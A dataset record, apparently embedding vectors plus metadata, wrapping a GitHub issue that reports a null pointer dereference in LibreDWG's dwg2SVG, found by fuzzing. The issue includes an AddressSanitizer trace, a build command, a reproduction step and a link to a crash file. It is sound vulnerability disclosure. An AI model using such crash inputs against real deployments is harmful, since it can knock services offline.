0.03197014331817627, 0.006628759205341339, 0.00551360659301281, 0.012314208783209324, 0.0033911606296896935, -0.00018623961659613997, 0.0024643042124807835, -0.0007275913376361132, 0.011341650038957596, -0.0007787786307744682, -0.003890237072482705, 0.008043723180890083, -0.032789140939712524, 0.006208291742950678, -0.0007582122925668955, -0.023633921518921852, -0.01595582254230976, -0.012321521528065205, -0.012072897516191006, 0.0034167543053627014, -0.009067469276487827, 0.005440481938421726, 0.030185898765921593, 0.033403389155864716, -0.009579342789947987, -0.010610401630401611, 0.00008672138937981799, -0.007275913376361132, 0.00538563821464777, -0.009191782213747501, 0.011912022717297077, -0.00192866544239223, -0.0295716505497694, -0.0022010551765561104, -0.0007664388394914567, 0.01974368467926979, 0.0024533355608582497, 0.009016281925141811, -0.014617638662457466, -0.04422585293650627, -0.0017211739905178547, 0.006676290184259415, 0.021995926275849342, 0.014142327941954136, -0.005919449031352997, -0.002319882856681943, -0.01162683591246605, -0.005681793671101332, -0.0006384705193340778, -0.003025536658242345, -0.00783897377550602, -0.014902825467288494, -0.011041837744414806, -0.0015383620047941804, 0.003491707146167755, 0.02215680107474327, -0.01895393617451191, -0.026164038106799126, 0.022610174492001534, 0.008738407865166664, 0.016789443790912628, -0.003129739547148347, -0.0030291930306702852, 0.006965132895857096, 0.017462192103266716, -0.006902976892888546, -0.012665207497775555, -0.006526384502649307, -0.010120466351509094, 0.0038609870243817568, -0.01964130997657776, 0.0072905379347503185, -0.006387447472661734, 0.005952354986220598, 0.014383639208972454, -0.0066872588358819485, 0.00870915874838829, -0.008482472039759159, 0.0030163961928337812, 0.006219260394573212, 0.002380210906267166, 0.007360006682574749, 0.0034021292813122272, -0.019860683009028435, -0.006844477262347937, 0.013140518218278885, -0.00266174110583961, -0.0005191857926547527, -0.026763660833239555, 0.008021785877645016, 0.008065660484135151, -0.0022156802006065845, 0.008804220706224442, 0.013667017221450806, -0.009740217588841915, -0.013323330320417881, 0.014383639208972454, 0.0026580849662423134, 0.012401958927512169, -0.021601052954792976, 0.019348809495568275, 0.010135090909898281, -0.010705464519560337, -0.027377909049391747, -0.002647116081789136, 0.019612058997154236, -0.0035885972902178764, -0.007177194580435753, 0.004025517962872982, -0.028972027823328972, 0.00299445865675807, 0.010676214471459389, 0.020899055525660515, -0.0071735386736691, 0.01601432077586651, -0.010054653510451317, -0.003864643396809697, -0.017184317111968994, 0.00965246744453907, 0.021952051669359207, -0.006215604022145271, -0.014003390446305275, 0.03299389034509659, 0.0002531944774091244, 0.0035465506371110678, -0.00564523134380579, -0.012182584032416344, 0.010215528309345245, 0.027948280796408653, -0.0037586125545203686, 0.023122048005461693, 0.012789519503712654, -0.005685449577867985, -0.002712928457185626, 0.0009012626251205802, 0.0055245752446353436, -0.009279531426727772, 0.017886314541101456, 0.029776399955153465, 0.021776551380753517, 0.008087597787380219, 0.0041754236444830894, 0.01946580968797207, 0.0396336168050766, 0.016423819586634636, 0.01016434095799923, 0.007199132349342108, 0.014456763863563538, 0.000097233074484393, 0.014873575419187546, 0.0022339613642543554, -0.004383828956633806, -0.009952278807759285, -0.005893855355679989, -0.01636531949043274, 0.0025630227755755186, 0.006266791373491287, 0.03767387568950653, 0.002513663377612829, 0.0021206180099397898, 0.004968827124685049, -0.02386792004108429, 0.002036524470895529, -0.01921718567609787, 0.022010551765561104, -0.009330718778073788, 0.0038609870243817568, 0.008416659198701382, -0.007736599072813988, 0.00896509550511837, -0.00039647327503189445, -0.02516954019665718, -0.007129663601517677, 0.0054075755178928375, -0.015575572848320007, -0.014464076608419418, -0.01270908210426569, 0.009710967540740967, -0.020986804738640785, 0.020153183490037918, -0.010705464519560337, 0.007999848574399948, 0.013286768458783627, -0.012475083582103252, 0.02242005057632923, -0.004979795776307583, -0.007736599072813988, 0.00046434218529611826, -0.008306972682476044, -0.021908177062869072, -0.0018281189259141684, -0.02069430612027645, -0.017374441027641296, 0.004723859019577503, -0.010559214279055595, -0.010449527762830257, 0.0053783259354531765, -0.021059930324554443, 0.004252204671502113, -0.005802449304610491, 0.01175846066325903, -0.022946547716856003, -0.0022010551765561104, -0.006471540778875351, -0.015882696956396103, 0.015648698434233665, -0.0036470971535891294, 0.01335258036851883, 0.005082170478999615, 0.012731020338833332, 0.0009145164513029158, -0.022800298407673836, 0.002043836982920766, -0.002449679421260953, 0.01520994957536459, 0.031004896387457848, -0.011751147918403149, -0.001806181506253779, 0.0015374480281025171, -0.010127779096364975, 0.002968864981085062, 0.005213795229792595, -0.010734714567661285, 0.012387333437800407, -0.01645307056605816, -0.017637690529227257, 0.019963057711720467, 0.0009762154659256339, 0.007568411994725466, 0.0022193363402038813, 0.001890274928882718, -0.015005200169980526, -0.02361929602921009, 0.0005557481199502945, -0.0015502448659390211, -0.00023788397083990276, 0.013476892374455929, -0.009740217588841915, -0.004811608698219061, 0.01776931621134281, 0.001877478091046214, -0.002237617503851652, -0.009403843432664871, -0.000990840489976108, 0.013667017221450806, 0.0019176966743543744, 0.001047512167133391, 0.0005493497010320425, -0.006837164517492056, -0.026222538203001022, 0.009462343528866768, 0.009235656820237637, -0.008029098622500896, 0.0004190962645225227, -0.004244891926646233, 0.005469731520861387, 0.008716470561921597, -0.00025388001813553274, -0.005078514106571674, 0.02465766668319702, 0.011670711450278759, -0.012350771576166153, 0.0161898210644722, 0.0041754236444830894, 0.032350391149520874, 0.0014643232570961118, 0.00014830614964012057, 0.0017897284124046564, -0.0033838481176644564, 0.004274141974747181, 0.0011727382661774755, -0.014054577797651291, -0.011963210068643093, 0.008285034447908401, -0.01602894626557827, -0.00771466176956892, 0.010573839768767357, -0.007897473871707916, -0.000014853466382191982, 0.02543278969824314, -0.0024697885382920504, -0.01776931621134281, 0.01430320180952549, -0.0054039196111261845, -0.0006000800058245659, -0.005020014476031065, 0.012387333437800407, -0.013155143707990646, -0.008891969919204712, 0.021747302263975143, -0.010135090909898281, 0.05136282742023468, 0.015063699334859848, 0.012782207690179348, 0.004424047656357288, -0.011963210068643093, -0.019027061760425568, 0.006336260121315718, -0.032964639365673065, 0.023824045434594154, -0.010932151228189468, -0.00982065498828888, 0.002681850455701351, 0.003625159850344062, -0.010069279000163078, -0.018383564427495003, -0.0014423858374357224, 0.011743836104869843, 0.010800526477396488, -0.016219070181250572, 0.007466037757694721, -0.007831661030650139, -0.004712890367954969, 0.004515453707426786, 0.013608517125248909, 0.019612058997154236, -0.003996267914772034, 0.013016206212341785, 0.014383639208972454, 0.0255059152841568, -0.017549941316246986, -0.00027901664725504816, 0.0021114773117005825, 0.01077127642929554, 0.01202171016484499, 0.013718204572796822, 0.016438445076346397, 0.0025739914271980524, 0.027538783848285675, -0.002025555819272995, -0.004190048668533564, 0.018939312547445297, 0.004705578088760376, -0.0032540515530854464, -0.02024093270301819, -0.013294080272316933, -0.0019835089333355427, -0.009798717685043812, -0.01576569676399231, 0.0018939311848953366, -0.002899396466091275, 0.001355550135485828, 0.017198942601680756, -0.023385297507047653, -0.0012842535506933928, 0.003113286569714546, 0.008935845457017422, 0.0013774875551462173, -0.011436711996793747, 0.004431360401213169, 0.005308857187628746, -0.03015664964914322, -0.014624951407313347, -0.022639423608779907, 0.0025502259377390146, -0.015736447647213936, 0.013038143515586853, 0.02240542508661747, 0.00312425522133708, -0.007890161126852036, 0.00044674656237475574, -0.006409384775906801, -0.0016919240588322282, -0.006413041148334742, 0.000681888370309025, -0.017623066902160645, -0.02904515340924263, 0.02224455028772354, 0.001715689548291266, -0.012380020692944527, 0.0021206180099397898, 0.008431284688413143, -0.01697956770658493, 0.0014241046737879515, 0.000374535855371505, -0.003045646008104086, -0.014968637377023697, 0.006862758193165064, -0.01595582254230976, -0.005488012917339802, 0.005762230604887009, 0.0010164340492337942, 0.014361701905727386, -0.00003396302054170519, 0.006471540778875351, -0.011093025095760822, -0.011773085221648216, 0.0010319731663912535, 0.0050382958725094795, 0.009842592291533947, 0.004416735377162695, -0.004683640785515308, -0.00042663724161684513, -0.02879652939736843, 0.0020602899603545666, -0.0193780604749918, -0.009732904843986034, -0.022785674780607224, -0.018222689628601074, -0.012211834080517292, -0.002082227496430278, -0.01810568943619728, 0.029337652027606964, -0.021864302456378937, 0.012862644158303738, -0.0007001695339567959, -0.000043874853872694075, -0.004076705314218998, 0.018398188054561615, 0.01150252390652895, -0.014610325917601585, 0.025315789505839348, 0.002937786979600787, 0.009228344075381756, -0.00892121996730566, -0.004420391283929348, 0.003071239683777094, 0.01409114059060812, 0.030566148459911346, 0.0022065395023673773, 0.0028500373009592295, 0.014500639401376247, -0.008774970658123493, 0.01039102766662836, -0.0012723708059638739, 0.0234437957406044, 0.020796680822968483, 0.010252091102302074, -0.003201036248356104, -0.007374631706625223, -0.009996154345571995, -0.02060655690729618, 0.029674025252461433, 0.014741950668394566, 0.02610553801059723, -0.023165922611951828, 0.0069468519650399685, -0.011846210807561874, -0.01392295304685831, 0.0009999810717999935, -0.013257518410682678, 0.026324912905693054, 0.010815151035785675, 0.018237313255667686, 0.0014195343246683478, -0.01214602217078209, 0.014127702452242374, -0.0029450994916260242, 0.03436863422393799, -0.02739253267645836, 0.014581075869500637, 0.018485939130187035, 0.006241197697818279, -0.014149639755487442, 0.016526194289326668, 0.009082094766199589, 0.003482566447928548, 0.0035831129644066095, 0.01627757027745247, 0.014522576704621315, 0.005678137298673391, -0.028986653313040733, 0.004764077719300985, 0.0033125514164566994, 0.0033034109510481358, 0.010018091648817062, 0.0021114773117005825, 0.00452276598662138, 0.003012739820405841, 0.004248548299074173, 0.007963285781443119, 0.005345419514924288, 0.008402034640312195, -0.03173614293336868, 0.007670786697417498, -0.019612058997154236, 0.010961401276290417, -0.017462192103266716, 0.004080361220985651, 0.00943309348076582, 0.031151145696640015, -0.005133357830345631, -0.018310438841581345, 0.01715506799519062, -0.0013985109981149435, -0.00030483881710097194, 0.01223377138376236, 0.013513455167412758, -0.011063775978982449, 0.020899055525660515, -0.020372556522488594, 0.005795137025415897, -0.014149639755487442, -0.0002911279443651438, 0.021922802552580833 ]
1,810
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
## Affected version the lastest version https://github.com/LibreDWG/libredwg/tree/0.12.4.4348 ## What's the problem? A null pointer deference was discovered in function output_SVG in dwg2SVG.c ASAN report: ``` <?xml version="1.0" encoding="UTF-8" standalone="no"?> <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" baseProfile="basic" width="100%" height="100%" viewBox="-12.019621 -58.848308 37.409022 104.239317"> <defs> AddressSanitizer:DEADLYSIGNAL ================================================================= ==4105970==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55ebc7a930f5 bp 0x7ffcd4596f20 sp 0x7ffcd4596ef0 T0) ==4105970==The signal is caused by a READ memory access. ==4105970==Hint: address points to the zero page. #0 0x55ebc7a930f4 in output_SVG /libredwg/programs/dwg2SVG.c:862 #1 0x55ebc7a93b59 in main /libredwg/programs/dwg2SVG.c:980 #2 0x7fcb3a58c0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #3 0x55ebc7a8ac0d in _start (/libredwg/fuzz/asan+0x209c0d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /libredwg/programs/dwg2SVG.c:862 in output_SVG ==4105970==ABORTING ``` ## Compile command CC="afl-clang-lto" CFLAGS="-g -fsanitize=address" ./configure --enable-release --disable-shared && make ## How can we reproduce the issue? ./dwg2SVG [poc] POC file: [id_000000,sig_11,src_010799,time_76993507,op_ext_AO,pos_1249.zip](https://github.com/LibreDWG/libredwg/files/7074864/id_000000.sig_11.src_010799.time_76993507.op_ext_AO.pos_1249.zip)
null pointer deference in function output_SVG in dwg2SVG.c
https://api.github.com/repos/LibreDWG/libredwg/issues/390/comments
1
2021-08-30T07:17:52
2022-02-05T10:52:09Z
https://github.com/LibreDWG/libredwg/issues/390
982,474,309
390
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : null pointer deference in function output_SVG in dwg2SVG.c Issue date: --- start body --- ## Affected version the lastest version https://github.com/LibreDWG/libredwg/tree/0.12.4.4348 ## What's the problem? A null pointer deference was discovered in function output_SVG in dwg2SVG.c ASAN report: ``` <?xml version="1.0" encoding="UTF-8" standalone="no"?> <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" baseProfile="basic" width="100%" height="100%" viewBox="-12.019621 -58.848308 37.409022 104.239317"> <defs> AddressSanitizer:DEADLYSIGNAL ================================================================= ==4105970==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55ebc7a930f5 bp 0x7ffcd4596f20 sp 0x7ffcd4596ef0 T0) ==4105970==The signal is caused by a READ memory access. ==4105970==Hint: address points to the zero page. #0 0x55ebc7a930f4 in output_SVG /libredwg/programs/dwg2SVG.c:862 #1 0x55ebc7a93b59 in main /libredwg/programs/dwg2SVG.c:980 #2 0x7fcb3a58c0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #3 0x55ebc7a8ac0d in _start (/libredwg/fuzz/asan+0x209c0d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /libredwg/programs/dwg2SVG.c:862 in output_SVG ==4105970==ABORTING ``` ## Compile command CC="afl-clang-lto" CFLAGS="-g -fsanitize=address" ./configure --enable-release --disable-shared && make ## How can we reproduce the issue? ./dwg2SVG [poc] POC file: [id_000000,sig_11,src_010799,time_76993507,op_ext_AO,pos_1249.zip](https://github.com/LibreDWG/libredwg/files/7074864/id_000000.sig_11.src_010799.time_76993507.op_ext_AO.pos_1249.zip) --- end body ---
1,894
[ -0.02557831071317196, 0.029527798295021057, 0.0014981119893491268, 0.010125047527253628, 0.06198539584875107, 0.005033799912780523, 0.011862820945680141, 0.0433150939643383, -0.02007775381207466, -0.012157237157225609, -0.02724427543580532, -0.0006453819805756211, 0.002644360763952136, 0.02636820822954178, 0.006337130442261696, 0.034295905381441116, -0.03441079705953598, 0.011180637404322624, -0.029843756929039955, -0.007177294231951237, 0.013435435481369495, -0.018512319773435593, -0.026195866987109184, 0.031366102397441864, -0.013887831009924412, 0.013255912810564041, -0.003168565221130848, 0.011482234112918377, -0.029154391959309578, -0.006247369572520256, 0.008516528643667698, 0.004674755968153477, 0.01686071790754795, 0.019891049712896347, 0.02125541865825653, 0.00081413279986009, 0.04213742911815643, 0.06043432280421257, 0.017894763499498367, 0.021126162260770798, -0.0033427018206566572, -0.06790244579315186, 0.01058462355285883, 0.0041792746633291245, -0.0025833232793956995, 0.013744212687015533, 0.014570014551281929, 0.006480748299509287, -0.036593787372112274, 0.015051133930683136, 0.017119228839874268, 0.007898973301053047, -0.013356445357203484, -0.06164071336388588, 0.010965210385620594, -0.01759316772222519, 0.0147782601416111, 0.023452768102288246, 0.0003673471219372004, 0.015122942626476288, -0.021083077415823936, 0.02164318598806858, 0.008279560133814812, 0.005267178639769554, 0.007712270133197308, 0.018727747723460197, -0.01686071790754795, -0.0015546615468338132, -0.04150551185011864, 0.0034468246158212423, -0.0071162567473948, -0.037053365260362625, 0.018713384866714478, 0.0335778146982193, 0.03449697047472, -0.035789526998996735, 0.011309892870485783, 0.0191873237490654, -0.01341389212757349, 0.008085676468908787, -0.0005062523414380848, 0.021456483751535416, -0.02764640562236309, 0.0175644438713789, -0.004315711557865143, -0.0015600471524521708, -0.006161198951303959, -0.07381949573755264, -0.010419463738799095, -0.022145848721265793, -0.01999158225953579, 0.013887831009924412, 0.008473443798720837, -0.028666092082858086, 0.02004902996122837, -0.024601710960268974, -0.016630928963422775, -0.012667080387473106, -0.03650761768221855, 0.0007970781880430877, -0.026282036677002907, 0.00004920028004562482, 0.005349759012460709, 0.041448064148426056, 0.003999752923846245, 0.02205967716872692, 0.01559688150882721, 0.0020214191172271967, 0.016113905236124992, 0.1348857432603836, 0.025736290961503983, -0.02517618052661419, -0.02958524413406849, -0.014297140762209892, -0.020609138533473015, 0.03116503916680813, 0.03288844972848892, -0.011338616721332073, -0.024630434811115265, -0.021743718534708023, -0.042281050235033035, -0.04009805992245674, -0.019014982506632805, -0.012379844672977924, -0.005805745255202055, 0.015180390328168869, -0.003988981246948242, -0.026655443012714386, -0.03765656054019928, -0.003454005578532815, -0.029140029102563858, -0.03935124725103378, 0.005321035627275705, 0.0012755045900121331, 0.008006686344742775, -0.005152284633368254, -0.05578111112117767, 0.0071270279586315155, -0.006599233020097017, 0.02037934958934784, -0.0795067548751831, -0.052305564284324646, 0.014462301507592201, 0.0028849204536527395, -0.023840537294745445, 0.0020196237601339817, -0.0164011400192976, -0.005382073111832142, -0.008214931935071945, -0.020566053688526154, -0.011898725293576717, -0.010771326720714569, 0.010333293117582798, 0.011266808025538921, 0.054976850748062134, 0.001967562362551689, 0.00026299990713596344, 0.015912840142846107, -0.006250959821045399, -0.008006686344742775, 0.010570262558758259, -0.011151913553476334, 0.011661756783723831, -0.045469362288713455, -0.040643807500600815, -0.004936858080327511, 0.001393091632053256, 0.009543395601212978, -0.015180390328168869, 0.026267675682902336, -0.01954636722803116, 0.014261236414313316, 0.016702737659215927, 0.004509595688432455, -0.062502421438694, -0.0071449801325798035, -0.011302712373435497, 0.01541017834097147, -0.02407032437622547, -0.029053859412670135, -0.02758895792067051, -0.005852420814335346, -0.023380959406495094, 0.009241798892617226, 0.002132722642272711, -0.0010636685183271766, 0.05089810863137245, -0.021714994683861732, -0.004182865377515554, 0.005522100254893303, -0.029470350593328476, -0.00006126191874500364, 0.0010511019499972463, -0.03360654041171074, 0.009471586905419827, -0.0008886344730854034, -0.036651235073804855, -0.028651729226112366, 0.011762289330363274, -0.023337874561548233, -0.006897239480167627, 0.028996411710977554, -0.004556271247565746, 0.012882506474852562, -0.005759069230407476, 0.019776156172156334, -0.023869261145591736, 0.037800177931785583, 0.010835954919457436, -0.03191184997558594, -0.009306426160037518, -0.026109695434570312, 0.008114399388432503, 0.012566547840833664, -0.0028561968356370926, 0.018095828592777252, -0.014196609146893024, 0.007245512679219246, -0.0071162567473948, 0.014060172252357006, 0.015912840142846107, -0.006455615162849426, -0.006434072740375996, -0.0047681075520813465, -0.053885359317064285, -0.01543890219181776, 0.009335150010883808, 0.0015735112829133868, -0.025348521769046783, 0.009026371873915195, 0.014670547097921371, -0.0352725051343441, 0.015079857781529427, -0.00449523376300931, 0.017406463623046875, 0.0023553301580250263, 0.024515539407730103, -0.006495110224932432, -0.0423959419131279, -0.008049771189689636, -0.0057088034227490425, 0.006803888361901045, 0.00590627733618021, -0.007669184822589159, 0.03647889196872711, 0.028666092082858086, -0.02083892747759819, -0.03156716749072075, 0.0055831377394497395, 0.027746938169002533, 0.003414510516449809, -0.016314970329403877, 0.029786309227347374, -0.0050697047263383865, 0.01139606349170208, -0.023768728598952293, 0.008674508891999722, 0.045814044773578644, -0.025693204253911972, -0.004570633172988892, 0.03570335730910301, 0.015912840142846107, -0.03320441022515297, 0.021743718534708023, 0.00859551876783371, 0.016688376665115356, -0.025391608476638794, -0.00540002528578043, 0.012315217405557632, -0.014505387283861637, 0.039035286754369736, -0.017736785113811493, -0.0017189242644235492, -0.05796410143375397, -0.051013004034757614, -0.0012054910184815526, 0.022907022386789322, 0.005680079571902752, 0.01680327020585537, -0.021758079528808594, -0.008250836282968521, -0.002437910297885537, -0.04170657694339752, 0.049490656703710556, 0.042625728994607925, -0.021370312198996544, 0.011870002374053001, -0.009270521812140942, -0.01644422486424446, 0.017349017783999443, 0.002087842207401991, 0.020522968843579292, -0.02688523195683956, 0.015280921943485737, 0.013356445357203484, 0.03133738040924072, 0.016286246478557587, -0.008121580816805363, -0.025506502017378807, -0.02720119059085846, 0.0063802157528698444, -0.02208840101957321, 0.008997648023068905, 0.013334902934730053, -0.009859354235231876, 0.013586233370006084, -0.0031901078764349222, 0.0030303332023322582, -0.0040212953463196754, -0.005877553950995207, 0.05006512627005577, -0.040643807500600815, 0.013974001631140709, -0.023797450587153435, 0.004649622831493616, -0.02438628487288952, -0.006473567336797714, -0.026181505993008614, 0.017506996169686317, 0.010835954919457436, -0.065891794860363, -0.02355330064892769, -0.021470844745635986, -0.00878222193568945, 0.030274609103798866, -0.008688869886100292, -0.028623005375266075, 0.0433150939643383, -0.07784079015254974, 0.029068220406770706, 0.0212697796523571, -0.01644422486424446, 0.004085923545062542, -0.014526929706335068, -0.004261855036020279, -0.03191184997558594, 0.006627956405282021, -0.004814783111214638, 0.008250836282968521, -0.006290454883128405, -0.008459081873297691, 0.022318189963698387, 0.016343694180250168, -0.025061286985874176, -0.011281169950962067, -0.020092114806175232, 0.02519054338335991, 0.00024280365323647857, 0.003068032907322049, 0.011130371131002903, 0.000856320490129292, 0.035416122525930405, 0.011554043740034103, -0.011963353492319584, 0.0029028726276010275, -0.003312183078378439, -0.00611811364069581, -0.019431473687291145, -0.008135941810905933, -0.01480698399245739, 0.02681342326104641, -0.02849375084042549, 0.014570014551281929, 0.02559267170727253, -0.005899096839129925, 0.03240014985203743, 0.00963674671947956, -0.013880649581551552, -0.013320541009306908, -0.0024630434345453978, -0.036220382899045944, 0.04050019010901451, -0.0191873237490654, -0.01879955641925335, -0.01846923492848873, -0.01064207125455141, 0.021054353564977646, 0.02325170487165451, -0.03196929767727852, 0.005023028701543808, -0.009191532619297504, 0.00096493138698861, -0.0066674514673650265, -0.02125541865825653, 0.04498106241226196, 0.05595345422625542, -0.02164318598806858, 0.02165754698216915, -0.001189333968795836, -0.014505387283861637, -0.016300607472658157, 0.03323313221335411, -0.005633404012769461, -0.05158747360110283, 0.024659156799316406, 0.04417680203914642, 0.01836870238184929, 0.009277703240513802, 0.02323734201490879, -0.03854698687791824, 0.0024630434345453978, 0.013298998586833477, 0.024314474314451218, 0.011683299206197262, 0.0002040942054009065, 0.03257249295711517, 0.022763404995203018, -0.0037520122714340687, 0.006337130442261696, 0.005974495783448219, 0.014878792688250542, -0.02441500686109066, -0.013112295418977737, -0.01765061356127262, 0.03515760973095894, 0.04210870712995529, -0.006473567336797714, -0.004620899446308613, -0.054689615964889526, 0.0016614771448075771, -0.005374892149120569, -0.04954810440540314, 0.014447939582169056, 0.031854402273893356, 0.01082159299403429, 0.010304569266736507, -0.012983039021492004, 0.0227490421384573, 0.04509595409035683, -0.025793736800551414, -0.021844251081347466, 0.03998316451907158, 0.0124157490208745, 0.027359170839190483, -0.03205546736717224, -0.019503282383084297, -0.028220877051353455, -0.046302344650030136, 0.006714127026498318, 0.029786309227347374, -0.005899096839129925, 0.03038950264453888, -0.01799529604613781, -0.014397673308849335, 0.014268417842686176, -0.06301943957805634, -0.033032070845365524, -0.04535446688532829, 0.024616071954369545, -0.015424540266394615, -0.001533118891529739, 0.022705957293510437, 0.008351368829607964, 0.0031003470066934824, 0.007618918549269438, -0.0010995729826390743, -0.021944783627986908, -0.008171847090125084, 0.020192647352814674, 0.01037637796252966, -0.019919773563742638, 0.01357187144458294, -0.045440636575222015, -0.019503282383084297, 0.00702290516346693, 0.04598638415336609, 0.020609138533473015, -0.020925097167491913, -0.0015546615468338132, -0.013349264860153198, 0.016630928963422775, 0.04334381967782974, 0.006035533268004656, 0.007855887524783611, -0.01242293044924736, 0.04880129173398018, -0.020982544869184494, -0.007180884480476379, -0.006854154169559479, -0.022232018411159515, 0.00020386980031616986, -0.010742602869868279, -0.025362884625792503, 0.0001942204835359007, 0.019488921388983727, -0.016688376665115356, 0.013866287656128407, 0.01637241616845131, -0.03211291506886482, 0.01595592498779297, 0.0249033086001873, 0.02835013158619404, -0.010232760570943356, -0.0705450102686882, -0.01160430908203125, 0.00008274847641587257, -0.02279212698340416, -0.0375991128385067, 0.03846081718802452, 0.015367092564702034, 0.030504398047924042, 0.007841525599360466, 0.03409484028816223, -0.015697414055466652, 0.017751146107912064, -0.026195866987109184, -0.035416122525930405, 0.015094219706952572, -0.004157732240855694, -0.01676018536090851, 0.025319799780845642, -0.0329458974301815, 0.0064843385480344296, -0.05888325348496437, 0.012164418585598469, -0.02396979182958603, 0.009859354235231876, -0.01599901169538498, 0.03007354401051998, 0.007055219262838364, -0.017535720020532608, -0.03558846563100815, -0.01082159299403429, 0.037110812962055206, 0.015884116291999817, 0.03337675333023071, 0.0232804287225008, -0.0038992203772068024, 0.0028705585282295942, -0.01924477145075798, -0.0038166402373462915, -0.015338369645178318, 0.004847097210586071, 0.06727052479982376, -0.0001463105290895328, 0.018684661015868187, -0.018541043624281883, 0.001082518370822072, -0.003698155516758561, -0.013385169208049774, -0.005392844323068857, 0.034181009978055954, -0.05032363906502724, 0.0021811937913298607, -0.009923982433974743, 0.005335397087037563, -0.019704347476363182, 0.009952706284821033, -0.01795221120119095, -0.014964963309466839, 0.008911477401852608, -0.01999158225953579, -0.010182494297623634, -0.007202427368611097, -0.014318684116005898, 0.008523710072040558, -0.02681342326104641, -0.010117866098880768, 0.02000594511628151, -0.009126904420554638, 0.01648731157183647, 0.0035868517588824034, 0.014512567780911922, -0.029053859412670135, -0.020968183875083923, -0.007676365785300732, 0.015611243434250355, 0.029786309227347374, -0.031480997800827026, -0.02045116014778614, 0.015324007719755173, 0.02880970947444439, 0.010290207341313362, -0.017808593809604645, -0.031136315315961838, -0.0019980811048299074, -0.022174570709466934, 0.0021506748162209988, 0.003649684600532055, -0.03521505743265152, 0.00295493402518332, -0.03205546736717224, -0.00690801115706563, 0.017090504989027977, -0.0034486197400838137, -0.006383806467056274, 0.015094219706952572, -0.018196361139416695, 0.019905412569642067, -0.009844992309808731, 0.000945183914154768, 0.016113905236124992, 0.001038535381667316, -0.0018230470595881343, -0.002588708885014057, -0.0071270279586315155, 0.002425343729555607, -0.014397673308849335, -0.008918658830225468, -0.012796335853636265, 0.008329826407134533, 0.002588708885014057, 0.008918658830225468, -0.03352037072181702, -0.02929800935089588, 0.009916801936924458, 0.02603788673877716, -0.002434319816529751, -0.003037514165043831, 0.03728315234184265, 0.006154017988592386, 0.02398415468633175, 0.04205125942826271, -0.017535720020532608, 0.017420826479792595, -0.014397673308849335, 0.0006839792476966977, 0.02998737432062626, -0.0352725051343441, 0.0007948341662995517, 0.02840757928788662, -0.03449697047472, 0.020235732197761536, 0.001655193860642612, 0.004671165253967047, 0.026167143136262894, -0.007403491996228695, 0.01917296089231968, -0.014009905979037285, -0.005662127397954464, -0.01769370026886463, 0.02039371244609356, 0.006782345473766327, -0.023783089593052864, -0.010441006161272526, 0.023481491953134537, 0.030935250222682953, 0.02007775381207466, -0.035042718052864075, 0.01644422486424446, -0.00899046752601862, 0.01301894336938858, -0.012099790386855602, -0.006423301063477993, -0.019417112693190575, -0.000052201663493178785, 0.018957534804940224, 0.006498700473457575, 0.011080104857683182, 0.0287809856235981, -0.040988489985466, -0.023883622139692307, -0.006171970162540674, 0.002513309707865119, 0.025334160774946213, -0.0027143743354827166, 0.025147458538413048, 0.0513576865196228, -0.007381949573755264, 0.03349164500832558, -0.004294169135391712, -0.04977789148688316, -0.039466142654418945, 0.006398167926818132, 0.00630122609436512, -0.007611737586557865, -0.04434914141893387, -0.008193389512598515, 0.0024971526581794024, 0.010455368086695671, -0.019029343500733376, -0.008882754482328892, -0.017937850207090378, -0.005496967118233442, -0.011546862311661243, -0.004775288049131632, -0.0011947196908295155, 0.020522968843579292, -0.0391501821577549, 0.024486815556883812, 0.024271389469504356, 0.015395816415548325, 0.006861335132271051, 0.024242665618658066, -0.0016264703590422869, 0.006243779323995113, -0.022935746237635612, -0.00391717255115509, -0.0268421471118927, -0.031050145626068115, 0.008609880693256855, -0.009363873861730099, -0.0037304696161299944, 0.01687507890164852, 0.03409484028816223, -0.02529107592999935, 0.01884264126420021, -0.01543890219181776, -0.020135199651122093, -0.02520490437746048, -0.029412902891635895, 0.00021890478092245758, 0.010254302993416786, -0.0050876569002866745, 0.009902440011501312, 0.036220382899045944, -0.0011695865541696548, 0.0021865793969482183, 0.019733071327209473, -0.02998737432062626, -0.012523462995886803, -0.008100037463009357, -0.04012678191065788, 0.02641129307448864, 0.006110932677984238, -0.00512356124818325, 0.009557757526636124, 0.010333293117582798, -0.013342083431780338, -0.006401758641004562, -0.037886347621679306, -0.030188439413905144, -0.02241872251033783, -0.027028849348425865, 0.01642986387014389, -0.02162882499396801, 0.010900583118200302, -0.015912840142846107, 0.00711266603320837, 0.019316580146551132, 0.012774793431162834, -0.018282532691955566, 0.039782099425792694, 0.02039371244609356, -0.01541017834097147, -0.022720318287611008, 0.019345302134752274, -0.023079363629221916, -0.005328216124325991, -0.026712890714406967, 0.001209081383422017, -0.012049524113535881, 0.0009792931377887726, -0.028508111834526062, -0.003611984895542264, -0.0026210229843854904, 0.009866535663604736, -0.005834468640387058, -0.006879287306219339, 0.004854278173297644, 0.008135941810905933, -0.005658537149429321, 0.010469730012118816, -0.01503677200525999, 0.009507491253316402, -0.019804880023002625, 0.018670300021767616, -0.021844251081347466, 0.013349264860153198, -0.012753251008689404, 0.0010430235415697098, 0.01726284623146057, -0.021097438409924507, 0.04004061222076416, 0.02323734201490879, 0.011453511193394661, 0.007073171436786652, -0.04282679408788681, 0.008631423115730286, 0.016257522627711296, 0.022993192076683044, -0.0008401634986512363, -0.00904073379933834, -0.004541909322142601, 0.0351288877427578, -0.01420378964394331, 0.01362213771790266, 0.005784202367067337, 0.022102762013673782, 0.01683199405670166, -0.02727299928665161, 0.019905412569642067, -0.028608644381165504, 0.03116503916680813, 0.0147782601416111, 0.023366598412394524, -0.004653213080018759, -0.032256532460451126, 0.018339978531003, -0.013672403991222382, -0.0004963786341249943, 0.002305063884705305, 0.025420330464839935, -0.02004902996122837, 0.0031093230936676264, -0.041419342160224915, 0.00021969019144307822, 